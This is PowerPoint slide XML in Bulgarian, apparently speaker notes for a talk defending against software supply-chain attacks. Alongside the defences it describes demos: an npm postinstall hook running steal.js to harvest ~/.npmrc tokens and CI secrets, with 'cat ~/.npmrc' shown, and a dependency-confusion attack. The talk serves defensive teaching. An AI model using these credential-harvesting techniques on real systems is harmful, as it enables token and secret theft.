              <a:t> commit SHA,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към</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>таг</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>тагът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бъде</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>преместен</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>под</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>вас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Private registry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>или</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> proxy — Artifactory, Nexus — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>плюс</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> scoped </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>пакети</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>срещу</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> dependency confusion.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Cooldown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нови</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>версии</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>например</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>minimumReleaseAge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pnpm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>повечето</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>злонамерени</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>версии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хващат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рамките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часове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оценявайте</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>пакетите</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>преди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им</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>вярвате</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenSSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Scorecard, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Socket.dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>и</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --ignore-scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>където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възможно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AC56A186-113F-75E6-9074-D9C21DBBB3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330856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D5DD528E-F7FF-D5FD-FBB5-F5D659F739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55C88F50-D892-25C4-44BD-BF096DF9AE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Като</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ПРОИЗВОДИТЕЛ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софтуер</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. SLSA framework </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>дефинира</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>нивата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сигурност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build </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>процеса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Подписвайте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provenance — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sigstore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/cosign, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>npm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> provenance, trusted publishing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>през</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> OIDC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>вместо</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>дълготрайни</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>токени</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Hardened, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ефимерни</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> build </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>среди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reproducible builds.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задължително</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2FA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>или</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> passkeys </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>за</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> maintainer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>акаунтите</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — account takeover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най-евтината</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>атака</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>точно</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>него</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>видяхме</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>при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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>през</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2025.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F022DC61-961B-68BF-E9E9-1514DFCFC4A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6860896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53F784AB-5BC8-5871-9A50-48D8D8901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4137D4A2-3461-074E-EC40-1770349FD5B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Като</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ОРГАНИЗАЦИЯ. Vendor risk management — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>въпросници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сигурност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преглед</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>преди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пуснете</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>доставчик</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Least privilege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сегментация</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>вендорският</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>софтуер</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>получава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каквото</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>му</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>трябва</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,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целата</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>мрежа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Мониторинг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изходящия</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>трафик</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — SUNBURST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>можеше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бъде</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>хванат</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>по</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>аномалиите</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Zero Trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>мислене</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>доверен</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>доставчик</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>не</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>значи</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>доверен</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>пакет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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> incident response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>план</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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включва</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>сценарий</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>компрометиран</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>доставчик</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>репетирайте</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>го</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>преди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ви</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>потрябва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C5DE2C5A-4863-E846-1334-11C4D37C32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568853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CA25DD7F-B0F0-B2D6-DDCD-DD5AAC9FA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E1A64107-72CC-73DB-03AE-48BE97D38D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bg-BG" dirty="0"/>
              <a:t>НЕ ЗАБРАВЯЙ – Да увеличиш текста в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>terminal-a !</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Демо</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1 —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живо</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Идеята</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>пускаш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install, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>а</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>той</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>изпълнява</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ТЕХНИЯ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>код</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>чрез</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>postinstall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hook. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Показвам</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>package.json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postinstall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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вика</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>steal.js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Скриптът</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>чете</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>npmrc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>там</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>седи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auth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>токенът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чист</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>текст</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> —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после</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>process.env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>където</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> CI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>любезно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експортирал</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>всичките</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> secrets: NPM_TOKEN, AWS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ключове</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, DB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>пароли</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Всичко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plain text, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>никакво</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>криптиране</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.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живо</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ще</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>как</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cat ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>npmrc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env </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>наистина</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>показват</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>тези</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>стойности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чист</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>текст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моята</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>машина</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,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скриптът</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ги</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>събира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Поуката</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>няма</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>нужда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rootkit — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>един</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>postinstall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hook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достатъчен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Затова</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --ignore-scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>е</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>важен</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.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BE25FA7A-5176-0F49-E6E2-1539B5C47A4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53751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84B0ED48-F3D4-1B55-A339-A33A218D0F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058C245C-D681-17E6-0D2D-46621C818E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Демо</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2 — dependency confusion,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локален</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Verdaccio registry.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Имаме</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>вътрешен</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>пакет</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>който</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>живее</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>само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частния</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ни</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> registry.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Нападателят</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>публикува</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>пакет</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>със</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>същото</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>име</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>или</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>със</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>същото</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
